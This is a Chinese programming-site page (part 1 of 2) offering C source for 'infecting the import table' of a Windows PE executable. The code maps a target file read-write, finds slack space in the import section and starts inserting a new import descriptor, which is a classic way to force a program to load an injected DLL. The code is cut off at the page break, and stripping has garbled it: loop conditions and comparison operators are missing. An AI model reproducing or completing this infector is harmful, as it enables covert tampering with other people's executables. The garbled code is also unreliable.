设为首页 加入收藏

TOP

一段感染引入表的vc代码(一)
2014-11-23 20:26:22 来源: 作者: 【 】 浏览:92
Tags:感染 引入 代码

文章作者:[E.S.T] 认真的雪


#include
#include <windows.h>

DWORD RVAToOffset(LPVOID lpBase,DWORD VirtualAddress)
{
IMAGE_DOS_HEADER *dosHeader;
IMAGE_NT_HEADERS *ntHeader;
IMAGE_SECTION_HEADER *sectionHeader;
int NumOfSections;
dosHeader=(IMAGE_DOS_HEADER*)lpBase;
ntHeader=(IMAGE_NT_HEADERS*)((BYTE*)lpBase+dosHeader->e_lfanew);
NumOfSections=ntHeader->FileHeader.NumberOfSections;
for (int i=0;i{
sectionHeader=(IMAGE_SECTION_HEADER*)((BYTE*)lpBase+dosHeader->e_lfanew+sizeof(IMAGE_NT_HEADERS))+i;
if(VirtualAddress>sectionHeader->VirtualAddress&&VirtualAddressVirtualAddress+sectionHeader->SizeOfRawData)
{
DWORD AposRAV=VirtualAddress-sectionHeader->VirtualAddress;
DWORD Offset=sectionHeader->PointerToRawData+AposRAV;
return Offset;
}
}
return 0;
}

int sectionNum(LPVOID lpBase,DWORD VirtualAddress)
{
IMAGE_DOS_HEADER *dosHeader;
IMAGE_NT_HEADERS *ntHeader;
IMAGE_SECTION_HEADER *sectionHeader;
int NumOfSections;
dosHeader=(IMAGE_DOS_HEADER*)lpBase;
ntHeader=(IMAGE_NT_HEADERS*)((BYTE*)lpBase+dosHeader->e_lfanew);
NumOfSections=ntHeader->FileHeader.NumberOfSections;
for (int i=0;i{
sectionHeader=(IMAGE_SECTION_HEADER*)((BYTE*)lpBase+dosHeader->e_lfanew+sizeof(IMAGE_NT_HEADERS))+i;
if(VirtualAddress>sectionHeader->VirtualAddress&&VirtualAddressVirtualAddress+sectionHeader->SizeOfRawData)
{

return i;
}
}
return -1;
}


int main(int argc, char* argv[])
{

HANDLE hFile=CreateFile(argv[1],GENERIC_READ|GENERIC_WRITE,0,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
if(hFile==INVALID_HANDLE_VALUE)
{
printf("CreateFile Failed ");
return 0;
}

HANDLE hMap=CreateFileMapping(hFile,NULL,PAGE_READWRITE,NULL,NULL,NULL);
if(hMap==INVALID_HANDLE_VALUE)
{
printf("CreateFileMapping Failed ");
return 0;
}

LPVOID lpBase=MapViewOfFile(hMap,FILE_MAP_WRITE,0,0,0);
if(lpBase==NULL)
{
printf("MapViewOfFile Failed ");
return 0;
}
IMAGE_DOS_HEADER *dosHeader;
IMAGE_NT_HEADERS *ntHeader;
dosHeader=(IMAGE_DOS_HEADER*)lpBase;

if (dosHeader->e_magic!=IMAGE_DOS_SIGNATURE)
{
printf("This is not a windows file ");
return 0;
}

ntHeader=(IMAGE_NT_HEADERS*)((BYTE*)lpBase+dosHeader->e_lfanew);
if(ntHeader->Signature!=IMAGE_NT_SIGNATURE)
{
printf("This is not a win32 file ");
return 0;
}
int numOfSections=ntHeader->FileHeader.NumberOfSections;

int ncout=sectionNum(lpBase,ntHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress);
if(ncout==-1)
{
printf("get section failed ");
return 0;
}
IMAGE_SECTION_HEADER *sectionHeader;
sectionHeader=(IMAGE_SECTION_HEADER*)((BYTE*)lpBase+dosHeader->e_lfanew+sizeof(IMAGE_NT_HEADERS))+ncout;
int nullsize=sectionHeader->SizeOfRawData-sectionHeader->Misc.VirtualSize;
printf("%d ",nullsize);
IMAGE_IMPORT_DESCRIPTOR *ImportDec=(IMAGE_IMPORT_DESCRIPTOR*)((BYTE*)lpBase+RVAToOffset(lpBase,ntHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress));
int i=0;
while(ImportDec->FirstThunk)
{
i++;
ImportDec++;
}
if(i*20+20*3+8+8>nullsize)
{
printf("file space is not enough ");
return 0;
}
IMAGE_IMPORT_DESCRIPTOR *newImport;
newImport=(IMAGE_IMPORT_DESCRIPTOR *)((BYTE*)lpBase+sectionHeader->Pointe
首页 上一页 1 2 下一页 尾页 1/2/2
】【打印繁体】【投稿】【收藏】 【推荐】【举报】【评论】 【关闭】 【返回顶部
分享到: 
上一篇VC++批量注释小技巧 下一篇用VC生成最小的EXE文件

评论

帐  号: 密码: (新用户注册)
验 证 码:
表  情:
内  容: